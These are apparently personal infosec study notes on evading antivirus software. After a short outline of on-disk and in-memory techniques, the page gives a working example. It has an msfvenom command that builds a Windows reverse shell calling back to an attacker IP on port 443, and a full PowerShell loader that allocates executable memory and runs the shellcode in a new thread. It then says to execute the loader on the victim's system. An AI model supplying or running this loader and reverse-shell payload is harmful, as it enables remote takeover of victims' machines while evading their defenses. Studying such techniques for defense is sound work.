akde/infosec

Information security is ultimately about managing risk


Short summary of techniques:

  • On-disk evasion
    • Packaging software (zip, …)
    • Obfuscators
    • Crypters
  • In-memory evasion
    • In-memory injection / PE injection (manipulates the process's own memory)
      • Remote Process Memory Injection (manipulates another process's memory)
    • Reflective DLL injection (while normal DLL injection loads a DLL from disk, reflective DLL injection loads a DLL directly from a process's memory)
    • Process Hollowing (a non-malicious process is started and suspended, its memory is overwritten with malicious code, then it is resumed)
    • Inline hooking (some memory is overwritten to jump to malicious code elsewhere)

Example of a manual In-memory injection

Create a reverse shell payload for PowerShell:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.211 LPORT=443 -f powershell -v sc

Use this PowerShell script, which injects the shellcode into its own (PowerShell) process and executes it in a new thread:

# C# signatures for the Win32 functions used below, compiled into the
# PowerShell process with Add-Type.
$code = '
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

[DllImport("msvcrt.dll")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);';

$var2 = Add-Type -memberDefinition $code -Name "iWin32" -namespace Win32Functions -passthru;

# Paste the byte array generated by msfvenom here (-v sc emits it as $sc).
[Byte[]]$var1 = SHELLCODE_HERE;

# Allocate at least one page; grow the buffer if the shellcode is larger.
$size = 0x1000;
if ($var1.Length -gt 0x1000) {$size = $var1.Length};

# 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE
$x = $var2::VirtualAlloc(0,$size,0x3000,0x40);

# Copy the shellcode byte by byte into the allocated region.
# ToInt32() assumes a 32-bit process: the shellcode and the PowerShell binary must match.
for ($i=0;$i -le ($var1.Length-1);$i++) {$var2::memset([IntPtr]($x.ToInt32()+$i), $var1[$i], 1)};

# Run the shellcode in a new thread and keep the host process alive.
$var2::CreateThread(0,0,$x,0,0,0);
for (;;) { Start-Sleep 60 };

Start a listener and execute the script on the victim's system via .\a.ps1 (Note: make sure to use the right PowerShell and shellcode for the architecture!)

Example of an automatic In-memory injection with Shellter

Shellter can inject shellcode into a binary.

See also incident response training March 2025, slide advanced5.
